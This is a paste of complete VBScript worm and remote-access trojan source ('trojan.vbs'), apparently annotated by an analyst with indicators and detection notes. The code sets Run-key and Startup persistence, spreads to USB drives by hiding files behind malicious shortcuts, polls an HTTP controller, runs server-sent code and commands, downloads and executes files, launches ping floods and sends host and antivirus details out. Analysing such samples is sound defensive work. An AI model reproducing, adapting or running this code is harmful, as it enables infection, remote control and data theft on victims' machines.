SecurityNajaf

SecurityWORM

Jan 15th, 2014
  ' Analyst note: "on error resume next" at script scope means a failing statement
  ' below is skipped and execution continues with the next one.
  1. on error resume next
  2.  
  3. '#################################################################
  4.  
  5. '<[ Recoder : Security.Najaf (c) skype : Security.Najaf ]>
  6.  
  7. '<[ Credits : NjQ8 and Mr.Hacker ]>
  8.  
  9. '<[ Thanks For : JoHn.Dz ]>
  10.  
  11. '#################################################################
  12.  
  13. ' \\ Configuration ~
  14. '-----------------------------------------
  ' Analyst note: WScript.Shell and Scripting.FileSystemObject are the COM objects
  ' the rest of the listing uses for registry, process-launch and file operations.
  15. dim shell
  16. set shell = WScript.CreateObject("WSCRIPT.SHELL")
  17. dim fs
  18. set fs = WScript.CreateObject("Scripting.filesystemobject")
  ' Analyst note: file name used for every dropped copy (host indicator).
  19. dim installname
  20. installname = "trojan.vbs"
  ' Analyst note: path resolves to the expanded %Temp% directory plus a trailing backslash.
  21. dim dir
  22. dir = "Temp"
  23. path = shell.ExpandEnvironmentStrings("%" & dir & "%") & "\"
  ' Analyst note: field delimiter for both the check-in string and the server's replies
  ' (network indicator).
  24. dim spl
  25. spl="|SE-NAJAF|"
  26. dim http
  27. set http = CreateObject("MICROSOFT.XMLHTTP")
  ' Analyst note: controller address as configured in this paste. 127.0.0.1 is loopback,
  ' so this looks like an unconfigured template - presumably other copies carry a
  ' different host/port; confirm per sample.
  28. dim host
  29. host = "127.0.0.1"
  30. dim port
  31. port = "1144"
  ' Analyst note: label that userinfo places in the check-in string.
  32. dim name
  33. name = "Sec_User"
  ' Analyst note: the current user's Startup folder, used as a persistence location by install.
  34. dim startup
  35. startup = shell.specialfolders ("startup") & "\"
  36. dim response
  37. dim i
  38. i = 0
  39. dim y
  40. y = 0
  41. dim oneonce
  42. dim cmd
  ' Analyst note: records whether the first run started from the root of a drive.
  ' The marker is read from and written to "HKCU\Windowsshell"; with no trailing
  ' backslash WScript.Shell treats this as a value named Windowsshell directly under
  ' the HKCU root, which makes it a compact host indicator.
  43. dim usb
  44. usb= shell.regread("HKCU\Windowsshell")
  45. if usb="" then
  ' Analyst note: mid(...,2) drops the drive letter, so the comparison is true only when
  ' the script path is <drive>:\trojan.vbs (the location xinstall copies to).
  46. if lcase( mid(wscript.scriptfullname,2))=":\" & lcase(installname) then
  47. usb="TRUE"
  48. shell.regwrite "HKCU\Windowsshell", usb, "REG_SZ"
  49. else
  50. usb="FALSE"
  51. shell.regwrite "HKCU\Windowsshell", usb, "REG_SZ"
  52.  
  53. end if
  54. end if
  ' Analyst note: clears any error left by regread when the value did not exist yet.
  55. Err.Clear
  56. ' \\ Settings ~
  57. '-----------------------------------------
  ' Analyst note: entry point. Persistence (install) and removable-drive copying
  ' (xinstall) run once, then the script polls the controller in an endless loop.
  ' Behavioural indicators visible here: a long-lived wscript.exe that repeatedly
  ' launches child processes with window style 7 (minimized) and issues an HTTP
  ' request roughly every 2 seconds.
  58. install
  59. xinstall
  60. while true
  61. cmd = ""
  ' Analyst note: check-in; Send POSTs to /READY and returns the reply body.
  62. cmd = Send ("READY","")
  ' Analyst note: reply is split on the "|SE-NAJAF|" delimiter; field 0 is the command
  ' name and the remaining fields are its arguments. Every argument is taken from the
  ' server reply without validation.
  63. response = split(cmd,spl)
  64. select case response(0)
  ' Analyst note: "uninstall" runs the script's own removal routine.
  65. Case "uninstall"
  66. uninstall
  ' Analyst note: "RE" relaunches the script and ends the current instance.
  67. case "RE"
  68. shell.run WScript.SCRIPTFULLNAME ,7
  69. WScript.Quit
  ' Analyst note: "download" fetches the URL in field 1 and saves it under path
  ' (%Temp%) with the name in field 2; the download sub then runs the saved file.
  70. case "download"
  71. download response(1),path & response(2)
  ' Analyst note: "update" overwrites %Temp%\trojan.vbs with the text in field 1
  ' (mode 2 = open for writing) and starts it with wscript.exe //B (batch mode).
  72. case "update"
  73. oneonce.close
  74. set oneonce = fs.opentextfile (path & installname ,2, false)
  75. oneonce.write response(1)
  76. oneonce.close
  77. shell.run "wscript.exe //B " & chr(34) & path & installname & chr(34),7
  78. wscript.quit
  ' Analyst note: "execute" passes field 1 to the VBScript Execute statement, i.e. the
  ' server reply is run as script code inside this process (no new process is created,
  ' so process-creation telemetry will not show it).
  79. case "execute"
  80. execute response(1)
  ' Analyst note: "cmd" concatenates field 1 onto %comspec% and runs the result.
  81. case "cmd"
  82. shell.run "%comspec%" & response(1),7
  ' Analyst note: "Attack" starts a continuous ping (-t) at the target in field 1 with
  ' the payload size in field 2; outbound ICMP from a cmd.exe child of wscript.exe is
  ' the observable.
  83. case "Attack"
  84. shell.run "%comspec%" & " /c ping " & response(1) & " -l " & response(2) & " -t",7
  ' Analyst note: "ourl" hands field 1 to "start".
  85. case "ourl"
  86. shell.run "%comspec% " & " /c start " & response(1),7
  87. case "close"
  88. WScript.Quit
  ' Analyst note: the next three commands call shutdown.exe (/s, /r, /l) with field 1
  ' as the /t delay.
  89. case "shutdown"
  90. shell.run "%comspec%" & " /c shutdown /s /t " & response(1),7
  91. case "restart"
  92. shell.run "%comspec%" & " /c shutdown /r /t " & response(1),7
  93. case "logoff"
  94. shell.run "%comspec%" & " /c shutdown /l /t " & response(1),7
  95. end select
  ' Analyst note: 2000 ms between polls; xinstall is repeated on every third pass so
  ' removable drives attached later are also written to.
  96. WSCRIPT.SLEEP 2000
  97. i = i + 1
  98. if i> 2 then
  99. i=0
  100. xinstall
  101. end if
  102.  
  103. wend
  104. ' \\ Sub and Function ~
  105. '-----------------------------------------
  ' Analyst note: Send(cmd, data) issues a synchronous (third argument false) HTTP POST
  ' to http://<host>:<port>/<cmd> and returns the response body as text.
  ' The request is plain HTTP, and the host profile built by userinfo is sent in a
  ' request header on every call. As written the header name is "User-Agent:" including
  ' the colon; how that appears on the wire is not shown here - confirm against a capture.
  ' Network indicator: repeated POSTs whose URL path is a bare command token (the main
  ' loop sends READY) with a header value starting "XDZX startinfo".
  106. function Send(cmd,data)
  107. Send = ""
  108. http.open "POST","http://" & host & ":" & port &"/" & cmd, false
  109. http.setRequestHeader "User-Agent:", userinfo
  110. http.send data
  111. Send = http.responseText
  112. end function
  ' Analyst note: builds the check-in string sent by Send. Layout as concatenated below:
  '   "XDZX startinfo" | name+hwid | OS caption | computer name | user name |
  '   antivirus names | usb marker | "1.2" | "XDZX"
  ' with "|SE-NAJAF|" as the separator (name and hwid are joined with no separator).
  ' Everything a defender needs to identify the reporting host is therefore present in
  ' clear text in the request.
  113. function userinfo
  114. on error resume next
  115. if userinfo = "" then
  116. x = "XDZX"
  117. userinfo = x & " startinfo" & spl & name & hwid & spl & OS & spl & computer & spl & username &spl & security & spl & usb & spl & "1.2" &spl & x
  118. end if
  119. end Function
  ' Analyst note: returns the expanded %computername% environment variable.
  120. function computer
  121. computer = shell.expandenvironmentstrings("%computername%")
  122. end function
  ' Analyst note: returns the expanded %username% environment variable.
  123. function username
  124. username = shell.expandenvironmentstrings("%username%")
  125. end function
  ' Analyst note: host identifier. Queries WMI (root\cimv2, Win32_LogicalDisk) and
  ' returns the first non-empty VolumeSerialNumber. Errors are suppressed, so the
  ' function returns an empty value if the query fails.
  126. function hwid
  127. on error resume next
  128. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  129. set disks = root.execquery ("select * from win32_logicaldisk")
  130. for each disk in disks
  131. if disk.volumeserialnumber <> "" then
  132. hwid = disk.volumeserialnumber
  133. exit for
  134. end if
  135. next
  136. End function
  ' Analyst note: enumerates installed antivirus products for the check-in string.
  ' It reads the OS version from Win32_OperatingSystem, chooses the WMI namespace
  ' root\securitycenter2 when the computed version is greater than 6 and
  ' root\securitycenter otherwise, then concatenates each AntiVirusProduct displayName
  ' followed by " .". Returns "Not Found" when nothing was collected. Errors are
  ' suppressed throughout.
  ' Detection angle: wscript.exe querying AntiVirusProduct in a SecurityCenter namespace.
  137. function security
  138. on error resume next
  139. security = ""
  140. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  141. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
  142. for each objitem in colitems
  143. versionstr = split (objitem.version,".")
  144. next
  145. versionstr = split (colitems.version,".")
  146. osversion = versionstr (0) & "."
  147. for x = 1 to ubound (versionstr)
  148. osversion = osversion & versionstr (i)
  149. next
  ' Analyst note: eval turns the assembled version text into a number for the comparison below.
  150. osversion = eval (osversion)
  151. if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
  152. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
  153. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
  154. for each objantivirus in colantivirus
  155. security = security & objantivirus.displayname & " ."
  156. next
  157. if security = "" then security = "Not Found"
  158. end function
  ' Analyst note: returns the Caption of Win32_OperatingSystem (the OS product name);
  ' if the query yields several rows the last one wins.
  159. Function OS
  160. Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  161. Set aa = a.ExecQuery ("Select * from Win32_OperatingSystem")
  162. For Each aaa in aa
  163. s= aaa.Caption
  164. next
  165. OS = s
  166. End Function
  ' Analyst note: removable-media propagation routine, called at start-up and then on
  ' every third poll of the main loop.
  ' What it leaves on a removable drive (all in the drive root):
  '   - a copy of trojan.vbs, marked hidden+system;
  '   - every other file that has an extension (except .lnk) marked hidden+system;
  '   - one "<original file name>.lnk" per such file whose target is cmd.exe and whose
  '     arguments start trojan.vbs and then the original file, using the icon
  '     registered for the original file's type.
  ' Triage: list the drive root with hidden and system files shown and inspect the
  ' target of any .lnk that points at cmd.exe. Disabling or restricting Windows Script
  ' Host for users who do not need it stops the .vbs from running when a shortcut is
  ' opened.
  167. sub xinstall
  168. On Error resume next
  169. for each xx in fs.Drives
  170. if xx.isready then
  171. if xx.FreeSpace >0 then
  ' Analyst note: FileSystemObject DriveType 1 is "Removable".
  172. if xx.drivetype=1 then
  ' Analyst note: an existing copy has its attributes reset to 0 (normal) so the
  ' overwrite below is not blocked by a read-only/hidden/system flag.
  173. if fs.fileexists(xx.path & "\" & installname) then
  174. fs.getfile(xx.path & "\" & installname).Attributes=0
  175. end if
  ' Analyst note: source is %Temp%\trojan.vbs, destination is the drive root.
  176. fs.copyfile path & installname , xx.path & "\" & installname,true
  177. For Each x In fs.GetFolder( xx.path & "\" ).Files
  178. wscript.sleep 1
  179. if instr(x.name,".") then
  180. if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
  ' Analyst note: 2+4 = Hidden + System. This runs before the name check, so the
  ' dropped copy is hidden as well as the user's files.
  181. x.Attributes = 2+4
  182. if ucase(x.name) <> ucase(installname) then
  183. With shell.CreateShortcut(xx.path & "\" & x.name & ".lnk")
  184. .TargetPath = "cmd.exe"
  185. .WorkingDirectory = ""
  ' Analyst note: WindowStyle 7 = minimized.
  186. .WindowStyle = 7
  187. .Arguments = "/c start " & Replace(installname," ", ChrW(34) _
  188. & " " & ChrW(34)) & "&start " & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & " & exit"
  ' Analyst note: looks up the extension's class under HKLM\SOFTWARE\Classes and reads
  ' that class's DefaultIcon, so the shortcut shows the icon the hidden file would have.
  189. .IconLocation = shell.regread("HKLM\SOFTWARE\Classes\" & shell.regread("HKLM\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) & "\") & "\DefaultIcon\")
  190. if instr( .iconlocation,",")=0 then
  191. .iconlocation = .iconlocation &",0"
  192. end if
  193. .Save()
  194. end with
  195. end if
  196. end if
  197. end if
  198. Next
  199. end if
  200. end if
  201. end if
  202. next
  203. Err.Clear
  204. end sub
  ' Analyst note: persistence routine. Host indicators established here:
  '   - a value named "trojan" (installname without its extension) under
  '     ...\CurrentVersion\Run in both HKCU and HKLM, whose data starts with
  '     wscript.exe //B followed by the quoted script name;
  '   - a copy of the script named trojan.vbs in the user's Startup folder;
  '   - a further copy at installdir & path.
  ' NOTE(review): installdir is not assigned anywhere in this listing; confirm the exact
  ' value data and copy destination against a live artefact before writing a detection
  ' on the full string. Errors (for example an HKLM write without admin rights) are
  ' suppressed by "on error resume next".
  205. sub install ()
  206. on error resume Next
  207. shell.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  208. shell.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  209. fs.copyfile wscript.scriptfullname,installdir & path,true
  210. fs.copyfile wscript.scriptfullname,startup & installname ,true
  211. end sub
  ' Analyst note: the script's own removal routine, reached through the "uninstall"
  ' command. It deletes the two Run values, the Startup-folder copy and the running
  ' script, then walks removable drives: non-.lnk files in the root get attributes
  ' reset to 0 (un-hidden), the drive copy of trojan.vbs is deleted, and for every
  ' other file it deletes "<text before the first dot>.lnk".
  ' Remediation caveat: xinstall names its shortcuts "<full file name>.lnk", which is
  ' not the name deleted here, and this routine touches neither the HKCU\Windowsshell
  ' marker nor the %Temp% copy. Do not treat a run of this routine as a clean-up;
  ' verify each artefact independently.
  212. sub uninstall
  213. on error resume next
  214. dim filename
  215. shell.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  216. shell.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  217. fs.deletefile startup & installname ,true
  218. fs.deletefile wscript.scriptfullname ,true
  219. for each drive In fs.drives
  220. if drive.isready = true then
  221. if drive.freespace > 0 then
  ' Analyst note: DriveType 1 = removable, the same filter xinstall uses.
  222. if drive.drivetype = 1 then
  223. for each file in fs.getfolder ( drive.path & "\").files
  224. on error resume next
  225. if instr (file.name,".") then
  226. if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
  ' Analyst note: attributes 0 = normal; reverses the hidden+system flags.
  227. file.attributes = 0
  228. if ucase (file.name) <> ucase (installname) then
  229. filename = split(file.name,".")
  230. fs.deletefile (drive.path & "\" & filename(0) & ".lnk" )
  231. else
  232. fs.deletefile (drive.path & "\" & file.name)
  233. end if
  234. end if
  235. end if
  236. next
  237. end if
  238. end if
  239. end if
  240. next
  241. wscript.quit
  242. end sub
  ' Analyst note: download-and-run helper behind the "download" command.
  ' It issues a synchronous GET for fileurl, deletes any existing file at the
  ' destination, writes the response body to disk through ADODB.Stream in binary mode
  ' (type 1) when the status is 200, and then runs the saved file via its short (8.3)
  ' path. The destination is installdir & filename; the main loop passes
  ' path & response(2), i.e. a server-chosen name under %Temp%. Nothing about the
  ' downloaded content is checked before it is run.
  ' Detection angle: wscript.exe instantiating msxml2.xmlhttp and adodb.stream, a new
  ' file appearing under %Temp%, and that file being started by wscript.exe shortly after.
  243. sub download (fileurl,filename)
  244. strlink = fileurl
  245. strsaveto = installdir & filename
  246. set objhttpdownload = createobject("msxml2.xmlhttp" )
  247. objhttpdownload.open "get", strlink, false
  248. objhttpdownload.send
  249. set objfsodownload = createobject ("scripting.filesystemobject")
  250. if objfsodownload.fileexists (strsaveto) then
  251. objfsodownload.deletefile (strsaveto)
  252. end if
  253. if objhttpdownload.status = 200 then
  254. dim objstreamdownload
  255. set objstreamdownload = createobject("adodb.stream")
  256. with objstreamdownload
  257. .type = 1
  258. .open
  259. .write objhttpdownload.responsebody
  260. .savetofile strsaveto
  261. .close
  262. end with
  263. set objstreamdownload = nothing
  264. end if
  ' Analyst note: runs the file only if it now exists on disk.
  265. if objfsodownload.fileexists(strsaveto) then
  266. shell.run objfsodownload.getfile (strsaveto).shortpath
  267. end if
  268. end sub